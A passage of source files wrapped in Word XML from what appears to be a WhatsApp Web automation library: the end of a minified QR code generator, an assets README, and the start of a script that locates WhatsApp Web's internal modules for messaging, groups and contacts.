e=t&lt;&lt;12;QRUtil.getBCHDigit(e)-QRUtil.getBCHDigit(QRUtil.G18)&gt;=0;)e^=QRUtil.G18&lt;&lt;QRUtil.getBCHDigit(e)-QRUtil.getBCHDigit(QRUtil.G18);return t&lt;&lt;12|e},getBCHDigit:function(t){for(var e=0;0!=t;)e++,t&gt;&gt;&gt;=1;return e},getPatternPosition:function(t){return QRUtil.PATTERN_POSITION_TABLE[t-1]},getMask:function(t,e,r){switch(t){case QRMaskPattern.PATTERN000:return(e+r)%2==0;case QRMaskPattern.PATTERN001:return e%2==0;case QRMaskPattern.PATTERN010:return r%3==0;case QRMaskPattern.PATTERN011:return(e+r)%3==0;case QRMaskPattern.PATTERN100:return(Math.floor(e/2)+Math.floor(r/3))%2==0;case QRMaskPattern.PATTERN101:return e*r%2+e*r%3==0;case QRMaskPattern.PATTERN110:return(e*r%2+e*r%3)%2==0;case QRMaskPattern.PATTERN111:return(e*r%3+(e+r)%2)%2==0;default:throw new Error("bad maskPattern:"+t)}},getErrorCorrectPolynomial:function(t){for(var e=new QRPolynomial([1],0),r=0;r&lt;t;r++)e=e.multiply(new QRPolynomial([1,QRMath.gexp(r)],0));return e},getLengthInBits:function(t,e){if(1&lt;=e&amp;&amp;e&lt;10)switch(t){case QRMode.MODE_NUMBER:return 10;case QRMode.MODE_ALPHA_NUM:return 9;case QRMode.MODE_8BIT_BYTE:case QRMode.MODE_KANJI:return 8;default:throw new Error("mode:"+t)}else if(e&lt;27)switch(t){case QRMode.MODE_NUMBER:return 12;case QRMode.MODE_ALPHA_NUM:return 11;case QRMode.MODE_8BIT_BYTE:return 16;case QRMode.MODE_KANJI:return 10;default:throw new Error("mode:"+t)}else{if(!(e&lt;41))throw new Error("type:"+e);switch(t){case QRMode.MODE_NUMBER:return 14;case QRMode.MODE_ALPHA_NUM:return 13;case QRMode.MODE_8BIT_BYTE:return 16;case QRMode.MODE_KANJI:return 12;default:throw new Error("mode:"+t)}}},getLostPoint:function(t){for(var e=t.getModuleCount(),r=0,o=0;o&lt;e;o++)for(var n=0;n&lt;e;n++){for(var i=0,a=t.isDark(o,n),s=-1;s&lt;=1;s++)if(!(o+s&lt;0||e&lt;=o+s))for(var h=-1;h&lt;=1;h++)n+h&lt;0||e&lt;=n+h||0==s&amp;&amp;0==h||a==t.isDark(o+s,n+h)&amp;&amp;i++;i&gt;5&amp;&amp;(r+=3+i-5)}for(o=0;o&lt;e-1;o++)for(n=0;n&lt;e-1;n++){var l=0;t.isDark(o,n)&amp;&amp;l++,t.isDark(o+1,n)&amp;&amp;l++,t.isDark(o,n+1)&amp;&amp;l++,t.isDark(o+1,n+1)&amp;&amp;l++,0!=l&amp;&amp;4!=l||(r+=3)}for(o=0;o&lt;e;o++)for(n=0;n&lt;e-6;n++)t.isDark(o,n)&amp;&amp;!t.isDark(o,n+1)&amp;&amp;t.isDark(o,n+2)&amp;&amp;t.isDark(o,n+3)&amp;&amp;t.isDark(o,n+4)&amp;&amp;!t.isDark(o,n+5)&amp;&amp;t.isDark(o,n+6)&amp;&amp;(r+=40);for(n=0;n&lt;e;n++)for(o=0;o&lt;e-6;o++)t.isDark(o,n)&amp;&amp;!t.isDark(o+1,n)&amp;&amp;t.isDark(o+2,n)&amp;&amp;t.isDark(o+3,n)&amp;&amp;t.isDark(o+4,n)&amp;&amp;!t.isDark(o+5,n)&amp;&amp;t.isDark(o+6,n)&amp;&amp;(r+=40);var u=0;for(n=0;n&lt;e;n++)for(o=0;o&lt;e;o++)t.isDark(o,n)&amp;&amp;u++;return r+=10*(Math.abs(100*u/e/e-50)/5)}},QRMath={glog:function(t){if(t&lt;1)throw new Error("glog("+t+")");return QRMath.LOG_TABLE[t]},gexp:function(t){for(;t&lt;0;)t+=255;for(;t&gt;=256;)t-=255;return QRMath.EXP_TABLE[t]},EXP_TABLE:new Array(256),LOG_TABLE:new Array(256)},i=0;i&lt;8;i++)QRMath.EXP_TABLE[i]=1&lt;&lt;i;for(i=8;i&lt;256;i++)QRMath.EXP_TABLE[i]=QRMath.EXP_TABLE[i-4]^QRMath.EXP_TABLE[i-5]^QRMath.EXP_TABLE[i-6]^QRMath.EXP_TABLE[i-8];for(i=0;i&lt;255;i++)QRMath.LOG_TABLE[QRMath.EXP_TABLE[i]]=i;function QRPolynomial(t,e){if(null==t.length)throw new Error(t.length+"/"+e);for(var r=0;r&lt;t.length&amp;&amp;0==t[r];)r++;this.num=new Array(t.length-r+e);for(var o=0;o&lt;t.length-r;o++)this.num[o]=t[o+r]}function QRRSBlock(t,e){this.totalCount=t,this.dataCount=e}function QRBitBuffer(){this.buffer=[],this.length=0}QRPolynomial.prototype={get:function(t){return this.num[t]},getLength:function(){return this.num.length},multiply:function(t){for(var e=new Array(this.getLength()+t.getLength()-1),r=0;r&lt;this.getLength();r++)for(var o=0;o&lt;t.getLength();o++)e[r+o]^=QRMath.gexp(QRMath.glog(this.get(r))+QRMath.glog(t.get(o)));return new QRPolynomial(e,0)},mod:function(t){if(this.getLength()-t.getLength()&lt;0)return this;for(var e=QRMath.glog(this.get(0))-QRMath.glog(t.get(0)),r=new Array(this.getLength()),o=0;o&lt;this.getLength();o++)r[o]=this.get(o);for(o=0;o&lt;t.getLength();o++)r[o]^=QRMath.gexp(QRMath.glog(t.get(o))+e);return new QRPolynomial(r,0).mod(t)}},QRRSBlock.RS_BLOCK_TABLE=[[1,26,19],[1,26,16],[1,26,13],[1,26,9],[1,44,34],[1,44,28],[1,44,22],[1,44,16],[1,70,55],[1,70,44],[2,35,17],[2,35,13],[1,100,80],[2,50,32],[2,50,24],[4,25,9],[1,134,108],[2,67,43],[2,33,15,2,34,16],[2,33,11,2,34,12],[2,86,68],[4,43,27],[4,43,19],[4,43,15],[2,98,78],[4,49,31],[2,32,14,4,33,15],[4,39,13,1,40,14],[2,121,97],[2,60,38,2,61,39],[4,40,18,2,41,19],[4,40,14,2,41,15],[2,146,116],[3,58,36,2,59,37],[4,36,16,4,37,17],[4,36,12,4,37,13],[2,86,68,2,87,69],[4,69,43,1,70,44],[6,43,19,2,44,20],[6,43,15,2,44,16],[4,101,81],[1,80,50,4,81,51],[4,50,22,4,51,23],[3,36,12,8,37,13],[2,116,92,2,117,93],[6,58,36,2,59,37],[4,46,20,6,47,21],[7,42,14,4,43,15],[4,133,107],[8,59,37,1,60,38],[8,44,20,4,45,21],[12,33,11,4,34,12],[3,145,115,1,146,116],[4,64,40,5,65,41],[11,36,16,5,37,17],[11,36,12,5,37,13],[5,109,87,1,110,88],[5,65,41,5,66,42],[5,54,24,7,55,25],[11,36,12],[5,122,98,1,123,99],[7,73,45,3,74,46],[15,43,19,2,44,20],[3,45,15,13,46,16],[1,135,107,5,136,108],[10,74,46,1,75,47],[1,50,22,15,51,23],[2,42,14,17,43,15],[5,150,120,1,151,121],[9,69,43,4,70,44],[17,50,22,1,51,23],[2,42,14,19,43,15],[3,141,113,4,142,114],[3,70,44,11,71,45],[17,47,21,4,48,22],[9,39,13,16,40,14],[3,135,107,5,136,108],[3,67,41,13,68,42],[15,54,24,5,55,25],[15,43,15,10,44,16],[4,144,116,4,145,117],[17,68,42],[17,50,22,6,51,23],[19,46,16,6,47,17],[2,139,111,7,140,112],[17,74,46],[7,54,24,16,55,25],[34,37,13],[4,151,121,5,152,122],[4,75,47,14,76,48],[11,54,24,14,55,25],[16,45,15,14,46,16],[6,147,117,4,148,118],[6,73,45,14,74,46],[11,54,24,16,55,25],[30,46,16,2,47,17],[8,132,106,4,133,107],[8,75,47,13,76,48],[7,54,24,22,55,25],[22,45,15,13,46,16],[10,142,114,2,143,115],[19,74,46,4,75,47],[28,50,22,6,51,23],[33,46,16,4,47,17],[8,152,122,4,153,123],[22,73,45,3,74,46],[8,53,23,26,54,24],[12,45,15,28,46,16],[3,147,117,10,148,118],[3,73,45,23,74,46],[4,54,24,31,55,25],[11,45,15,31,46,16],[7,146,116,7,147,117],[21,73,45,7,74,46],[1,53,23,37,54,24],[19,45,15,26,46,16],[5,145,115,10,146,116],[19,75,47,10,76,48],[15,54,24,25,55,25],[23,45,15,25,46,16],[13,145,115,3,146,116],[2,74,46,29,75,47],[42,54,24,1,55,25],[23,45,15,28,46,16],[17,145,115],[10,74,46,23,75,47],[10,54,24,35,55,25],[19,45,15,35,46,16],[17,145,115,1,146,116],[14,74,46,21,75,47],[29,54,24,19,55,25],[11,45,15,46,46,16],[13,145,115,6,146,116],[14,74,46,23,75,47],[44,54,24,7,55,25],[59,46,16,1,47,17],[12,151,121,7,152,122],[12,75,47,26,76,48],[39,54,24,14,55,25],[22,45,15,41,46,16],[6,151,121,14,152,122],[6,75,47,34,76,48],[46,54,24,10,55,25],[2,45,15,64,46,16],[17,152,122,4,153,123],[29,74,46,14,75,47],[49,54,24,10,55,25],[24,45,15,46,46,16],[4,152,122,18,153,123],[13,74,46,32,75,47],[48,54,24,14,55,25],[42,45,15,32,46,16],[20,147,117,4,148,118],[40,75,47,7,76,48],[43,54,24,22,55,25],[10,45,15,67,46,16],[19,148,118,6,149,119],[18,75,47,31,76,48],[34,54,24,34,55,25],[20,45,15,61,46,16]],QRRSBlock.getRSBlocks=function(t,e){var r=QRRSBlock.getRsBlockTable(t,e);if(null==r)throw new Error("bad rs block @ typeNumber:"+t+"/errorCorrectLevel:"+e);for(var o=r.length/3,n=[],i=0;i&lt;o;i++)for(var a=r[3*i+0],s=r[3*i+1],h=r[3*i+2],l=0;l&lt;a;l++)n.push(new QRRSBlock(s,h));return n},QRRSBlock.getRsBlockTable=function(t,e){switch(e){case QRErrorCorrectLevel.L:return QRRSBlock.RS_BLOCK_TABLE[4*(t-1)+0];case QRErrorCorrectLevel.M:return QRRSBlock.RS_BLOCK_TABLE[4*(t-1)+1];case QRErrorCorrectLevel.Q:return QRRSBlock.RS_BLOCK_TABLE[4*(t-1)+2];case QRErrorCorrectLevel.H:return QRRSBlock.RS_BLOCK_TABLE[4*(t-1)+3];default:return}},QRBitBuffer.prototype={get:function(t){var e=Math.floor(t/8);return 1==(this.buffer[e]&gt;&gt;&gt;7-t%8&amp;1)},put:function(t,e){for(var r=0;r&lt;e;r++)this.putBit(1==(t&gt;&gt;&gt;e-r-1&amp;1))},getLengthInBits:function(){return this.length},putBit:function(t){var e=Math.floor(this.length/8);this.buffer.length&lt;=e&amp;&amp;this.buffer.push(0),t&amp;&amp;(this.buffer[e]|=128&gt;&gt;&gt;this.length%8),this.length++}};var QRCodeLimitLength=[[17,14,11,7],[32,26,20,14],[53,42,32,24],[78,62,46,34],[106,84,60,44],[134,106,74,58],[154,122,86,64],[192,152,108,84],[230,180,130,98],[271,213,151,119],[321,251,177,137],[367,287,203,155],[425,331,241,177],[458,362,258,194],[520,412,292,220],[586,450,322,250],[644,504,364,280],[718,560,394,310],[792,624,442,338],[858,666,482,382],[929,711,509,403],[1003,779,565,439],[1091,857,611,461],[1171,911,661,511],[1273,997,715,535],[1367,1059,751,593],[1465,1125,805,625],[1528,1190,868,658],[1628,1264,908,698],[1732,1370,982,742],[1840,1452,1030,790],[1952,1538,1112,842],[2068,1628,1168,898],[2188,1722,1228,958],[2303,1809,1283,983],[2431,1911,1351,1051],[2563,1989,1423,1093],[2699,2099,1499,1139],[2809,2213,1579,1219],[2953,2331,1663,1273]];function QRCode(t){if(this.options={padding:4,width:256,height:256,typeNumber:4,color:"#000000",background:"#ffffff",ecl:"M"},"string"==typeof t&amp;&amp;(t={content:t}),t)for(var e in t)this.options[e]=t[e];if("string"!=typeof this.options.content)throw new Error("Expected 'content' as string!");if(0===this.options.content.length)throw new Error("Expected 'content' to be non-empty!");if(!(this.options.padding&gt;=0))throw new Error("Expected 'padding' value to be non-negative!");if(!(this.options.width&gt;0&amp;&amp;this.options.height&gt;0))throw new Error("Expected 'width' or 'height' value to be higher than zero!");var r=this.options.content,o=function(t,e){for(var r=function(t){var e=encodeURI(t).toString().replace(/\%[0-9a-fA-F]{2}/g,"a");return e.length+(e.length!=t?3:0)}(t),o=1,n=0,i=0,a=QRCodeLimitLength.length;i&lt;=a;i++){var s=QRCodeLimitLength[i];if(!s)throw new Error("Content too long: expected "+n+" but got "+r);switch(e){case"L":n=s[0];break;case"M":n=s[1];break;case"Q":n=s[2];break;case"H":n=s[3];break;default:throw new Error("Unknwon error correction level: "+e)}if(r&lt;=n)break;o++}if(o&gt;QRCodeLimitLength.length)throw new Error("Content too long");return o}(r,this.options.ecl),n=function(t){switch(t){case"L":return QRErrorCorrectLevel.L;case"M":return QRErrorCorrectLevel.M;case"Q":return QRErrorCorrectLevel.Q;case"H":return QRErrorCorrectLevel.H;default:throw new Error("Unknwon error correction level: "+t)}}(this.options.ecl);this.qrcode=new QRCodeModel(o,n),this.qrcode.addData(r),this.qrcode.make()}QRCode.prototype.svg=function(t){var e=this.options||{},r=this.qrcode.modules;void 0===t&amp;&amp;(t={container:e.container||"svg"});for(var o=void 0===e.pretty||!!e.pretty,n=o?"  ":"",i=o?"\r\n":"",a=e.width,s=e.height,h=r.length,l=a/(h+2*e.padding),u=s/(h+2*e.padding),g=void 0!==e.join&amp;&amp;!!e.join,d=void 0!==e.swap&amp;&amp;!!e.swap,f=void 0===e.xmlDeclaration||!!e.xmlDeclaration,c=void 0!==e.predefined&amp;&amp;!!e.predefined,R=c?n+'&lt;defs&gt;&lt;path id="qrmodule" d="M0 0 h'+u+" v"+l+' H0 z" style="fill:'+e.color+';shape-rendering:crispEdges;" /&gt;&lt;/defs&gt;'+i:"",p=n+'&lt;rect x="0" y="0" width="'+a+'" height="'+s+'" style="fill:'+e.background+';shape-rendering:crispEdges;"/&gt;'+i,m="",Q="",v=0;v&lt;h;v++)for(var E=0;E&lt;h;E++){if(r[E][v]){var M=E*l+e.padding*l,C=v*u+e.padding*u;if(d){var B=M;M=C,C=B}if(g){var w=l+M,L=u+C;M=Number.isInteger(M)?Number(M):M.toFixed(2),C=Number.isInteger(C)?Number(C):C.toFixed(2),w=Number.isInteger(w)?Number(w):w.toFixed(2),Q+="M"+M+","+C+" V"+(L=Number.isInteger(L)?Number(L):L.toFixed(2))+" H"+w+" V"+C+" H"+M+" Z "}else m+=c?n+'&lt;use x="'+M.toString()+'" y="'+C.toString()+'" href="#qrmodule" /&gt;'+i:n+'&lt;rect x="'+M.toString()+'" y="'+C.toString()+'" width="'+l+'" height="'+u+'" style="fill:'+e.color+';shape-rendering:crispEdges;"/&gt;'+i}}g&amp;&amp;(m=n+'&lt;path x="0" y="0" style="fill:'+e.color+';shape-rendering:crispEdges;" d="'+Q+'" /&gt;');var T="";switch(t.container){case"svg":f&amp;&amp;(T+='&lt;?xml version="1.0" standalone="yes"?&gt;'+i),T+='&lt;svg xmlns="http://www.w3.org/2000/svg" version="1.1" width="'+a+'" height="'+s+'"&gt;'+i,T+=R+p+m,T+="&lt;/svg&gt;";break;case"svg-viewbox":f&amp;&amp;(T+='&lt;?xml version="1.0" standalone="yes"?&gt;'+i),T+='&lt;svg xmlns="http://www.w3.org/2000/svg" version="1.1" viewBox="0 0 '+a+" "+s+'"&gt;'+i,T+=R+p+m,T+="&lt;/svg&gt;";break;case"g":T+='&lt;g width="'+a+'" height="'+s+'"&gt;'+i,T+=R+p+m,T+="&lt;/g&gt;";break;default:T+=(R+p+m).replace(/^\s+/,"")}return T},QRCode.prototype.save=function(t,e){var r=this.svg();"function"!=typeof e&amp;&amp;(e=function(t,e){});try{require("fs").writeFile(t,r,e)}catch(t){e(t)}},"undefined"!=typeof module&amp;&amp;(module.exports=QRCode);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">--- END FILE: packages/core/src/transport/assets/qr.min.js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packages/core/src/transport/assets/README.md ---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">## Files here should not be touched.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Files inside this directory are automatically generated and copied into dist bundle with the build scripts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packages/core/src/transport/assets/README.md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packages/core/src/transport/assets/wapi.js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script contains WAPI functions that need to be run in the context of the webpage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 discovery the webpack object references of instances that contains all functions used by the WAPI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * functions and creates the Store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if (!window.Store || !window.Store.Msg) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    (function () {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        function getStore() {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            let neededObjects = [</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                { id: "MediaCollection", module: "WAWebAttachMediaCollection", conditions: (module) =&gt; (module.default &amp;&amp; module.default.prototype &amp;&amp; (module.default.prototype.processFiles !== undefined || module.default.prototype.processAttachments !== undefined)) ? module.default : null },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                { id: "Archive", module: "WAWebSetArchiveChatAction", conditions: (module) =&gt; (module.setArchive) ? module : null },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                { id: "Block", module: "WAWebBlockContactUtils", conditions: (module) =&gt; (module.blockContact &amp;&amp; module.unblockContact) ? module : null },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                { id: "ChatUtil", module: "WAWebSendClearChatAction", conditions: (module) =&gt; (module.sendClear) ? module : null },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                { id: "GroupInvite", module: "WAWebGroupInviteJob", conditions: (module) =&gt; (module.queryGroupInviteCode) ? module : null },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                { id: "Wap", module: "WAWebCreateGroupAction", conditions: (module) =&gt; (module.createGroup) ? module : null },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                { id: "State", module: "WAWebSocketModel", conditions: (module) =&gt; (module.STATE &amp;&amp; module.STREAM) ? module : null },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                { id: "_Presence", module: "WAWebContactPresenceBridge", conditions: (module) =&gt; (module.setPresenceAvailable &amp;&amp; module.setPresenceUnavailable) ? module : null },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                { id: "WapDelete", module: "WAWebChatDeleteBridge", conditions: (module) =&gt; (module.sendConversationDelete &amp;&amp; module.sendConversationDelete.length == 2) ? module : null },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                { id: "WapQuery", module: "WAWebQueryExistsJob", conditions: (module) =&gt; (module.queryExist) ? module : ((module.default &amp;&amp; module.default.queryExist) ? module.default : null) },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                { id: "UserConstructor", module: "WAWebWid", conditions: (module) =&gt; (module.default &amp;&amp; module.default.prototype &amp;&amp; module.default.prototype.isServer &amp;&amp; module.default.prototype.isUser) ? module.default : null },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                { id: "SendTextMsgToChat", module: "WAWebSendTextMsgChatAction", resolver: (module) =&gt; module.sendTextMsgToChat},</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                { id: "ReadSeen", module: "WAWebUpdateUnreadChatAction", conditions: (module) =&gt; (module.sendSeen) ? module : null },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                { id: "sendDelete", module: "WAWebDeleteChatAction", conditions: (module) =&gt; (module.sendDelete) ? module.sendDelete : null },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                { id: "addAndSendMsgToChat", module: "WAWebSendMsgChatAction", conditions: (module) =&gt; (module.addAndSendMsgToChat) ? module.addAndSendMsgToChat : null },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                { id: "Catalog", module: "WAWebCatalogCollection", conditions: (module) =&gt; (module.Catalog) ? module.Catalog : null },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                { id: "MsgKey", module: "WAWebMsgKey", conditions: (module) =&gt; (module.default &amp;&amp; module.default.toString &amp;&amp; module.default.toString().includes('MsgKey error: obj is null/undefined')) ? module.default : null },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                { id: "Parser", module: "WAWebE2EProtoUtils", conditions: (module) =&gt; (module.convertToTextWithoutSpecialEmojis) ? module.default : null },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                { id: "Builders", module: "WAWebProtobufsE2E.pb", conditions: (module) =&gt; (module.TemplateMessage &amp;&amp; module.HydratedFourRowTemplate) ? module : null },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                { id: "Me", module: "WAWebUserPrefsMeUser", conditions: (module) =&gt; (module.PLATFORMS &amp;&amp; module.Conn) ? module.default : null },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                { id: "MyStatus", module: "WAWebContactStatusBridge", conditions: (module) =&gt; (module.getStatus &amp;&amp; module.setMyStatus) ? module : null },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                { id: "ChatStates", module: "WAWebChatStateBridge", conditions: (module) =&gt; (module.sendChatStatePaused &amp;&amp; module.sendChatStateRecording &amp;&amp; module.sendChatStateComposing) ? module : null },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                { id: "GroupActions", module: "WAWebExitGroupAction", conditions: (module) =&gt; (module.sendExitGroup &amp;&amp; module.localExitGroup) ? module : null },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                { id: "Participants", module: "WAWebGroupsParticipantsApi", conditions: (module) =&gt; (module.addParticipants &amp;&amp; module.removeParticipants &amp;&amp; module.promoteParticipants &amp;&amp; module.demoteParticipants) ? module : null },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                { id: "WidFactory", module: "WAWebWidFactory", conditions: (module) =&gt; (module.isWidlike &amp;&amp; module.createWid &amp;&amp; module.createWidFromWidLike) ? module : null },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                { id: "Sticker", module: "WAWebStickerPackCollection", resolver: m=&gt; m.StickerPackCollection, conditions: (module) =&gt; (module.default &amp;&amp; module.default.Sticker) ? module.default.Sticker : null },</w:t>
      </w:r>
    </w:p>
